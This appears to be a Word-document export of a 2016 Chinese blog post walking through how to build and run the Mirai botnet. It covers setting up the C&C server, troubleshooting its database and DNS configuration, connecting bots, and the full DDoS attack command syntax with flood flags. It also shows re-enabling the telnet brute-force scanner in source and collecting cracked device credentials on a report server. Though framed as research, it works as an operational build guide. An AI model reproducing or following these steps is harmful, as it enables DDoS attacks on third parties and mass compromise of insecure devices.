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7" w:rsidRPr="00556C27" w:rsidRDefault="00556C27" w:rsidP="00556C27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r w:rsidRPr="00556C27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Build Mirai botnet (II): Bruteforce and DDoS Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00556C27" w:rsidRPr="00556C27" w:rsidRDefault="00556C27" w:rsidP="00556C27">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150"/>
        <w:jc w:val="right"/>
        <w:outlineLvl w:val="0"/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</w:pPr>
      <w:r w:rsidRPr="00556C27">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="777777"/>
          <w:kern w:val="36"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t>[Research]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00556C27" w:rsidRPr="00556C27" w:rsidRDefault="00556C27" w:rsidP="00556C2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6C27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2016-11-08 14:07:46</w:t>
      </w:r>
      <w:r w:rsidRPr="00556C2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556C27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cdxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00556C2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556C27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Mirai,botnet,malware,DoS</w:t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登入CNC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首先看一下CNC部分的源码。 入口 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/Mirai/mirai/cnc/main.go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line 18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func main()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tel, err := net.Listen("tcp", "0.0.0.0:23")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err != nil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fmt.Println(err)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api, err := net.Listen("tcp", "0.0.0.0:101")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err != nil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fmt.Println(err)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go func()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for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conn, err := api.Accept()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err != nil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break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go apiHandler(conn)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}()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for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conn, err := tel.Accept()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err != nil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break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go initialHandler(conn)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fmt.Println("Stopped accepting clients")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开启23和101两个端口，其中23端口处理telnet登录，101端口作为API。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跟进initialHandler()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initialHandler(conn net.Conn) -&gt; NewAdmin(conn).Handle()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跟进Handle()：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/Mirai/mirai/cnc/admin.go line:20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func (this *Admin) Handle()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该函数首先读取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prompt.txt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作为提示返回给用户，然后分别接受用户输入的username &amp; password ，再与数据库存储的信息对比判断。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特别注意：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作者留坑，源码中prompt.txt路径为相对路径，且找不到此文件会中断退出。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headerb, err := ioutil.ReadFile("prompt.txt")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err != nil {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可以直接把读取prompt.txt相关代码注释掉，如果不想变动源码，</w:t>
      </w:r>
      <w:r w:rsidRPr="00556C2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则应在</w:t>
      </w:r>
      <w:r w:rsidRPr="00556C27">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>prompt.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00556C2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的路径下启动CNC服务器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root@xy:~/Mirai/mirai# ./debug/cnc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Mysql DB opened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然后通过telnet连接cnc主机23端口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telnet your-cnc-domain 23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直接回车即可进入登入界面。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输入之前在数据库中INSERT的用户名和密码，登入成功后：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я люблю куриные наггетсы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пользователь: mirai-user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пароль: **********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проверив счета...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Succesfully hijacked connection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Masking connection from utmp+wtmp...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Hiding from netstat...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Removing all traces of LD_PRELOAD...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Wiping env libc.poison.so.1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Wiping env libc.poison.so.2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Wiping env libc.poison.so.3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Wiping env libc.poison.so.4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[+] DDOS | Setting up virtual terminal...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[!] Sharing access IS prohibited!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[!] Do NOT share your credentials!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Ready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mirai-user@botnet# </w:t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错误排查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如果telnet连上之后输入任意命令都直接断开，请考虑前文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prompt.txt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的路径问题。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还有之前我登录时遇到这个错误。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произошла неизвестная ошибка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нажмите любую клавишу для выхода. (any key)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此时cnc端的报错信息。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dial tcp: missing port in address 127.0.0.1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修改/Mirai/mirai/cnc/main.go 加入端口号即可：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DatabaseAddr string   = "127.0.0.1:3306"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再废话一句，main.go配置的数据库信息最好先用Mysql命令手动测试一下。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如果你的配置是：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DatabaseAddr string   = "127.0.0.1:3306"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DatabaseUser string   = "root"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DatabasePass string   = "root"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DatabaseTable string  = "mirai"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用以下命令验证：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mysql -h127.0.0.1 -P3306 -uroot -proot mirai</w:t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Bot连接CNC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bot主机执行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mirai.dbg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即可连接CNC服务器：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root@kali:/home/xy/Desktop/Mirai/mirai/debug# ./mirai.dbg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DEBUG MODE YO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We are the only process on this system!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listening tun0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Attempting[ to kicollennr] eTrcyint g tto ko illCN pCort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23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[killer] Finding and killing processes holding port 23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Failed to find inode for port 23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[killer] Failed to kill port 23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[killer] Bound to tcp/23 (telnet)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[resolv] Got response from select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[resolv] Found IP address: f3251c73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Resolved xxxx.xxx.xx to 1 IPv4 addresses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Resolved domain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Connected to CNC. Local address = -335435584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[killer] Detected we are running out of `/home/xy/Desktop/Mirai/mirai/debug/mirai.dbg`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[killer] Memory scanning processes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[table] Tried to access table.11 but it is locked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Got SIGSEGV at address: 0x0</w:t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错误排查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无法解析CNC域名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bot通过table.c设置的域名来寻找CNC服务器。其中解析域名的功能由resolv.c实现，该文件84行硬编码了DNS服务器的地址：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addr.sin_addr.s_addr = INET_ADDR(8,8,8,8);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因此，如果本地搭建环境，或者bot处于AP内网，需要修改IP为本地DNS服务器的IP。</w:t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攻击指令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adduser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添加用户并为其分配bot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botcount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查看已接入的bot数量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mirai-user@botnet# botcount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:   1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提示参数：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?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?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可以理解为一个占位符，解释当前位置参数的意义。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?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获取攻击命令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mirai-user@botnet# ?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Available attack list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udp: UDP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vse: Valve source engine specific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dns: DNS resolver flood using the targets domain, input IP is ignored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syn: SYN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greeth: GRE Ethernet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ack: ACK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stomp: TCP stomp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greip: GRE IP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udpplain: UDP flood with less options. optimized for higher PPS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http: HTTP flood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输入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udp ?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查看下一个参数的提示，然后每次输入一个参数之后都可以使用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?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查看进一步提示。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mirai-user@botnet# udp ?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Comma delimited list of target prefixes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Ex: 192.168.0.1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Ex: 10.0.0.0/8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Ex: 8.8.8.8,127.0.0.0/29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mirai-user@botnet# udp 8.8.8.8 ?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Duration of the attack, in seconds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mirai-user@botnet# udp 8.8.8.8 10 ?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List of flags key=val seperated by spaces. Valid flags for this method are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tos: TOS field value in IP header, default is 0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ident: ID field value in IP header, default is random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ttl: TTL field in IP header, default is 255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len: Size of packet data, default is 512 bytes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rand: Randomize packet data content, default is 1 (yes)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df: Set the Dont-Fragment bit in IP header, default is 0 (no)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sport: Source port, default is random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dport: Destination port, default is random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source: Source IP address, 255.255.255.255 for random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Value of 65535 for a flag denotes random (for ports, etc)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Ex: seq=0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Ex: sport=0 dport=65535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用户通过CNC执行攻击指令之后，bot会收到CNC命令并对目标发起攻击：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Connected to CNC. Local address = -335435584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Received 14 bytes from CNC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[attack] Starting attack...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Received 18 bytes from CNC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[attack] Starting attack...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[main] Received 18 bytes from CNC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[attack] Starting attack...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[main] Received 19 bytes from CNC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[attack] Starting attack...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同时，在CNC的Mysql库中也可查询到攻击历史：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mysql&gt; select * from history;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+----+---------+------------+----------+-------------------+----------+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| id | user_id | time_sent  | duration | command           | max_bots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+----+---------+------------+----------+-------------------+----------+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|  1 |       1 | 1478583439 |        1 | syn 10.0.0.1/24 1 |       -1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|  2 |       1 | 1478583522 |        1 | syn 8.8.8.8/26 1  |       -1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|  3 |       1 | 1478583560 |       10 | syn 8.8.8.8/26 10 |       -1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|  4 |       1 | 1478584054 |        1 | udp 8.8.8.8/28 1  |       -1 |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+----+---------+------------+----------+-------------------+----------+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4 rows in set (0.00 sec)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telnet爆破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之前我们使用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./build debug telnet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作为测试环境查看debug信息输出，并已成功使用CNC控制Bot发起攻击。现在我们来关注Mirai感染并控制Bot的流程。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Bot扫描网段内开启telnet的设备，并使用内置字典爆破之，将成功之后的信息返回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该功能在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scanner.c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实现，源码默认在Debug模式下关闭了scanner的功能，为方便调试，我们需要修改源码：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/Mirai/mirai/bot/scanner.c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line 158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注释掉这两行：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//#ifndef DEBUG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#ifdef MIRAI_TELNET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printf("[scanner] init\n");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scanner_init();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556C27" w:rsidRPr="00556C27" w:rsidRDefault="00556C27" w:rsidP="00556C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56C27">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//#endif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重新编译并运行，就可以看到scanner的调试信息，</w:t>
      </w:r>
      <w:r w:rsidRPr="00556C2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注意要以root权限运行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964680" cy="5387340"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="3" name="图片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7" w:rsidRPr="00556C27" w:rsidRDefault="00556C27" w:rsidP="00556C27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接收爆破结果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在之前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teble.c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中配置的report服务器中运行</w:t>
      </w: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./scanListen</w:t>
      </w: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，默认监听48101端口，该服务将接收bot爆破出的结果。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/Mirai/mirai/debug &amp;&amp; ./scanListen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scanner成功爆破出结果时，会通过resolv模块寻找report服务器所在IP，然后通过report模块发送受害者的信息，如图：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509260" cy="2720340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="2" name="图片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此时report-server接收到数据如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00556C27" w:rsidRPr="00556C27" w:rsidRDefault="00556C27" w:rsidP="00556C27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6C27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189220" cy="1592580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1" name="图片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CF" w:rsidRDefault="009E5BCF">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="009E5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7"/>
    <w:rsid w:val="00556C27"/>
    <w:rsid w:val="009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A66F2-D8F3-4FD6-895B-2258EFC6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C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6C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56C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C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6C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56C2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ost-datetime">
    <w:name w:val="post-datetime"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00556C27"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00556C27"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-user">
    <w:name w:val="post-user"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00556C27"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-tags">
    <w:name w:val="post-tags"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00556C27"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00556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C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56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6C27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6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64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088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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-22T10:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-22T10:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>